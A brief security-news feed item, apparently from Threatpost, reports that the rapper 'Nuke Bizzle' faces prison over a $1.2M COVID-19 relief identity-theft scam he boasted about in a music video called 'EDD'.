Rapper Scams $1.2M in COVID-19 Relief, Gloats with ‘EDD’ Video

Threatpost - Mon, 2020/10/19 - 21:22
"Nuke Bizzle" faces 22 years in prison after brazenly bragging about an identity-theft campaign in his music video, "EDD."
Categories: Security Posts
Syndicate content